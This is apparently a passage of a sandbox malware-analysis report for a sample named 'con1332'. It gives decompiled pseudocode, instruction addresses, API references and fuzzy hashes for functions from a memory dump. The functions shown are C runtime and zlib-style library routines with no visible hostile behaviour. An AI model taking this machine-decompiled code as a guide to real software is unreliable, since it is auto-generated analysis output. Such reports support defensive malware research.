				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}

0x00417089
0x00417090
0x00417098
0x0041709a
0x004170a0
0x004170a6
0x004170bb
0x004170c5
0x004170cb
0x004170ce
0x004170d0
0x004170d0
0x004170bd
0x004170bd
0x004170bd
0x004170bb
0x004170dd
0x00417101
0x00417101
0x00417109
0x004172bb
0x004172be
0x004172c1
0x004172c4
0x004172cb
0x004172cb
0x004172ce
0x004172d1
0x004172d8
0x004172d8
0x004172de
0x004172e4
0x004172e7
0x004172ea
0x004172f3
0x004172f6
0x004173ef
0x004173f1
0x004173f1
0x004173f4
0x004173f6
0x004173f9
0x004173fe
0x004173ff
0x00417402
0x00417404
0x00417406
0x00417409
0x0041740b
0x0041740c
0x00417411
0x00417409
0x00417412
0x00000000
0x00417412
0x00417309
0x0041730e
0x00417311
0x00417314
0x00417316
0x00000000
0x00000000
0x0041732a
0x0041732c
0x0041732f
0x00417331
0x0041733a
0x00417379
0x00417379
0x00417379
0x0041737b
0x0041737b
0x0041737d
0x00000000
0x00000000
0x00417384
0x0041739c
0x0041739e
0x004173a1
0x004173a3
0x004173bf
0x004173c1
0x004173c9
0x004173cb
0x004173cb
0x004173a5
0x004173a5
0x004173a5
0x004173cf
0x00000000
0x004173d4
0x0041733c
0x0041733f
0x00000000
0x00000000
0x00417341
0x00417344
0x00417349
0x00417362
0x00417368
0x0041736a
0x0041736c
0x00417372
0x00417372
0x00417372
0x00417375
0x00000000
0x00417375
0x0041734b
0x00417350
0x00417352
0x00417354
0x00000000
0x00000000
0x00417356
0x0041735c
0x00000000
0x0041735c
0x00417333
0x00417333
0x00000000
0x00000000
0x00000000
0x00000000
0x00417117
0x0041711a
0x004172ec
0x004172ec
0x00417414
0x00417425
0x00417425
0x00417120
0x00417126
0x0041712d
0x0041712d
0x00417130
0x00417153
0x00417155
0x00417157
0x00000000
0x0041715d
0x0041715d
0x004171a2
0x004171a2
0x004171a5
0x004171a8
0x00000000
0x00000000
0x004171c1
0x004172aa
0x004172ad
0x004172b2
0x00000000
0x004172b5
0x004171c7
0x004171db
0x004171dd
0x004171e2
0x00000000
0x00000000
0x004171ef
0x0041721a
0x0041721c
0x00417263
0x00417263
0x00417263
0x00417265
0x00417265
0x00417267
0x00417277
0x0041727d
0x0041727f
0x00417281
0x00417282
0x00417283
0x00417286
0x0041728c
0x0041728f
0x00417288
0x00417288
0x00417289
0x00417289
0x004172a0
0x004172a0
0x004172a4
0x004172a9
0x00000000
0x00417267
0x00417222
0x00417223
0x00417225
0x00417228
0x00000000
0x00000000
0x0041722a
0x0041722a
0x0041722e
0x00417233
0x0041724c
0x00417252
0x00417254
0x00417256
0x0041725c
0x0041725c
0x0041725c
0x0041725f
0x00000000
0x0041725f
0x00417235
0x0041723a
0x0041723c
0x0041723e
0x00000000
0x00000000
0x00417240
0x00417246
0x00000000
0x00417246
0x004171f4
0x00417213
0x00417213
0x00000000
0x004171f4
0x00417163
0x00417164
0x00417169
0x00000000
0x00000000
0x0041716b
0x0041716b
0x00417174
0x0041718a
0x00417190
0x00417192
0x0041719d
0x0041719d
0x00000000
0x0041719d
0x00417194
0x0041719a
0x0041719a
0x00000000
0x0041719a
0x00417176
0x0041717b
0x0041717f
0x00000000
0x00000000
0x00417181
0x00000000
0x00417181
0x00417157
0x00417109
0x004170df
0x004170e2
0x004170e5
0x004170e5
0x004170e8
0x00000000
0x00000000
0x004170ea
0x004170ed
0x00000000
0x00000000
0x004170ef
0x00000000
0x004170ef
0x004170f7
0x004170fb
0x004170fd
0x004170fd
0x004170fe
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02CA18B0), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

0x004057b7
0x004057bf
0x004057c3
0x004057c5
0x004057cd
0x004059c8
0x004059ce
0x004057db
0x004057e3
0x004057e5
0x004057ea
0x00405921
0x0040592a
0x004057f0
0x004057f3
0x004057f6
0x004057f9
0x004057fc
0x004057ff
0x00405801
0x00405804
0x00405807
0x0040580a
0x0040580d
0x00405810
0x00405813
0x00405816
0x00405819
0x0040581c
0x00405824
0x00405827
0x0040582b
0x0040582e
0x00405831
0x00405834
0x00405837
0x00405837
0x00405839
0x0040583a
0x00405842
0x00405847
0x0040584a
0x0040584f
0x0040591c
0x0040591c
0x00000000
0x00405855
0x00405855
0x00405859
0x0040585b
0x00000000
0x00405870
0x00405872
0x00405874
0x00405874
0x00405877
0x0040587b
0x00405881
0x00405881
0x00405885
0x00405889
0x00405897
0x00405899
0x004058a5
0x004058a7
0x004058b3
0x004058b5
0x004058c1
0x004058c5
0x004058c7
0x004058c7
0x004058c8
0x004058b7
0x004058b7
0x004058b7
0x004058a9
0x004058a9
0x004058a9
0x0040589b
0x0040589b
0x0040589b
0x0040588f
0x00405892
0x00405892
0x004058cc
0x004058cf
0x00000000
0x00000000
0x004058d1
0x004058d9
0x00000000
0x00000000
0x004058db
0x004058db
0x004058e0
0x00000000
0x004058e2
0x004058e4
0x00405930
0x0040593f
0x00405942
0x00405944
0x00405949
0x0040594c
0x0040594e
0x00000000
0x00405950
0x00405950
0x00405953
0x00000000
0x00000000
0x00000000
0x00000000
0x00405953
0x004058e6
0x004058ea
0x004058ec
0x004058f1
0x004058f2
0x004058f4
0x004058f6
0x004058f8
0x004058f9
0x00405904
0x00405906
0x0040590b
0x0040590e
0x00405911
0x00405916
0x00000000
0x00405955
0x00405955
0x00405955
0x00405961
0x00405963
0x00405967
0x0040596d
0x0040596e
0x0040597c
0x0040597d
0x00405970
0x00405970
0x00405974
0x00405975
0x00405975
0x00405985
0x00405988
0x0040598a
0x00000000
0x0040598c
0x0040598c
0x00405990
0x004059a5
0x004059ad
0x004059b6
0x004059b6
0x004059b9
0x004059c5
0x00405992
0x00405992
0x004059a2
0x004059a2
0x00405990
0x0040598a
0x00405916
0x004058e4
0x00000000
0x00405860
0x00405860
0x00405862
0x00405864
0x00405865
0x00405868
0x00000000
0x0040586a
0x0040586a
0x0040586d
0x00000000
0x00405868
0x0040584f
0x004057ea
0x00000000

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t90;
				intOrPtr* _t92;
				signed int _t94;
				char _t97;
				signed int _t105;
				void* _t106;
				signed int _t107;
				signed int _t110;
				signed int _t113;
				intOrPtr* _t114;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				char* _t121;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				void* _t134;

				_t125 = __edx;
				_t121 = _a4;
				_t119 = _a8;
				_t131 = 0;
				_v12 = _t121;
				_v8 = _t119;
				if(_a12 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t138 = _t121;
					if(_t121 != 0) {
						_t133 = _a20;
						__eflags = _t133;
						if(_t133 == 0) {
							L9:
							__eflags = _t119 - 0xffffffff;
							if(_t119 != 0xffffffff) {
								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
								_t134 = _t134 + 0xc;
							}
							__eflags = _t133 - _t131;
							if(__eflags == 0) {
								goto L3;
							} else {
								_t94 = _t90 | 0xffffffff;
								_t125 = _t94 % _a12;
								__eflags = _a16 - _t94 / _a12;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t131 = _a12 * _a16;
								__eflags =  *(_t133 + 0xc) & 0x0000010c;
								_v20 = _t131;
								_t120 = _t131;
								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t133 + 0x18));
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t133 + 0xc) & 0x0000010c;
										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t120 - _v16;
											if(_t120 < _v16) {
												_t97 = E0040FC07(_t120, _t125, _t133);
												__eflags = _t97 - 0xffffffff;
												if(_t97 == 0xffffffff) {
													L48:
													return (_t131 - _t120) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L44:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E0040BA30(_t131, _a4, 0, _a8);
														_t134 = _t134 + 0xc;
													}
													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													L4:
													E0040E744(_t125, _t131, _t133);
													goto L5;
												}
												_t123 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t97;
												_t120 = _t120 - 1;
												_t70 =  &_v8;
												 *_t70 = _v8 - 1;
												__eflags =  *_t70;
												_v16 =  *((intOrPtr*)(_t133 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t105 = 0x7fffffff;
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t105 = _t120;
												}
											} else {
												__eflags = _t120 - 0x7fffffff;
												if(_t120 <= 0x7fffffff) {
													_t55 = _t120 % _v16;
													__eflags = _t55;
													_t125 = _t55;
													_t110 = _t120;
												} else {
													_t125 = 0x7fffffff % _v16;
													_t110 = 0x7fffffff;
												}
												_t105 = _t110 - _t125;
											}
											__eflags = _t105 - _v8;
											if(_t105 > _v8) {
												goto L44;
											} else {
												_push(_t105);
												_push(_v12);
												_t106 = E0040FA20(_t125, _t131, _t133);
												_pop(_t123);
												_push(_t106);
												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
												_t134 = _t134 + 0xc;
												__eflags = _t107;
												if(_t107 == 0) {
													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
													goto L48;
												}
												__eflags = _t107 - 0xffffffff;
												if(_t107 == 0xffffffff) {
													L47:
													_t80 = _t133 + 0xc;
													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
													__eflags =  *_t80;
													goto L48;
												}
												_v12 = _v12 + _t107;
												_t120 = _t120 - _t107;
												_v8 = _v8 - _t107;
												goto L39;
											}
										}
										_t113 =  *(_t133 + 4);
										__eflags = _t113;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L47;
										}
										_t131 = _t120;
										__eflags = _t120 - _t113;
										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}

0x0040bcc2
0x0040bcca
0x0040bcce
0x0040bcd3
0x0040bcd5
0x0040bcd8
0x0040bcde
0x0040bd01
0x00000000
0x0040bce5
0x0040bce5
0x0040bce7
0x0040bd08
0x0040bd0b
0x0040bd0d
0x0040bd1c
0x0040bd1c
0x0040bd1f
0x0040bd24
0x0040bd29
0x0040bd29
0x0040bd2c
0x0040bd2e
0x00000000
0x0040bd30
0x0040bd30
0x0040bd35
0x0040bd38
0x0040bd3b
0x00000000
0x00000000
0x0040bd3d
0x0040bd40
0x0040bd44
0x0040bd4b
0x0040bd4e
0x0040bd50
0x0040bd5a
0x0040bd52
0x0040bd55
0x0040bd55
0x0040bd61
0x0040bd63
0x0040be53
0x00000000
0x0040bd69
0x0040bd69
0x0040bd69
0x0040bd70
0x0040bdb6
0x0040bdb6
0x0040bdb9
0x0040be24
0x0040be2a
0x0040be2d
0x0040beb8
0x00000000
0x0040bebe
0x0040be33
0x0040be37
0x0040be87
0x0040be87
0x0040be8b
0x0040be95
0x0040be9a
0x0040be9a
0x0040bea2
0x0040beaa
0x0040beab
0x0040beac
0x0040bead
0x0040beae
0x0040bcf9
0x0040bcf9
0x00000000
0x0040bcfe
0x0040be39
0x0040be3c
0x0040be3f
0x0040be44
0x0040be45
0x0040be45
0x0040be45
0x0040be48
0x00000000
0x0040be48
0x0040bdbb
0x0040bdbf
0x0040bde0
0x0040bde5
0x0040bde7
0x0040bde9
0x0040bde9
0x0040bdc1
0x0040bdc8
0x0040bdca
0x0040bdd7
0x0040bdd7
0x0040bdd7
0x0040bdda
0x0040bdcc
0x0040bdce
0x0040bdd1
0x0040bdd1
0x0040bddc
0x0040bddc
0x0040bdeb
0x0040bdee
0x00000000
0x0040bdf4
0x0040bdf4
0x0040bdf5
0x0040bdf9
0x0040bdfe
0x0040bdff
0x0040be00
0x0040be05
0x0040be08
0x0040be0a
0x0040bec6
0x00000000
0x0040bec6
0x0040be10
0x0040be13
0x0040beb4
0x0040beb4
0x0040beb4
0x0040beb4
0x00000000
0x0040beb4
0x0040be19
0x0040be1c
0x0040be1e
0x00000000
0x0040be1e
0x0040bdee
0x0040bd72
0x0040bd75
0x0040bd77
0x00000000
0x00000000
0x0040bd79
0x00000000
0x00000000
0x0040bd7f
0x0040bd81
0x0040bd83
0x0040bd85
0x0040bd85
0x0040bd87
0x0040bd8a
0x0040be5b
0x0040be5d
0x0040be61
0x0040be6a
0x0040be6f
0x0040be6f
0x0040be72
0x0040be77
0x0040be78
0x0040be79
0x0040be7a
0x0040be7b
0x0040be81
0x00000000
0x0040bd90
0x0040bd99
0x0040bd9e
0x0040bda1
0x0040bda3
0x0040bda6
0x0040bda8
0x0040bdab
0x0040bdae
0x0040bdae
0x0040be4b
0x0040be4b
0x0040be4b
0x00000000
0x0040bd69
0x0040bd63
0x0040bd2e
0x0040bd0f
0x0040bd14
0x0040bd14
0x0040bd17
0x0040bd1a
0x00000000
0x00000000
0x00000000
0x0040bd1a
0x0040bce9
0x0040bce9
0x0040bcee
0x0040bcef
0x0040bcf0
0x0040bcf1
0x0040bcf2
0x0040bcf8
0x00000000
0x0040bcf8

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}

0x00414738
0x00414738
0x00414738
0x00414738
0x00414738
0x0041473a
0x0041473f
0x00414749
0x0041474b
0x00414753
0x00414777
0x00414779
0x0041477f
0x00414783
0x00414786
0x00414791
0x00414794
0x0041479b
0x00414755
0x00414755
0x00414759
0x00000000
0x0041475b
0x00414760
0x00414760
0x00414759
0x00414765
0x00414769
0x0041476e
0x00414776

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

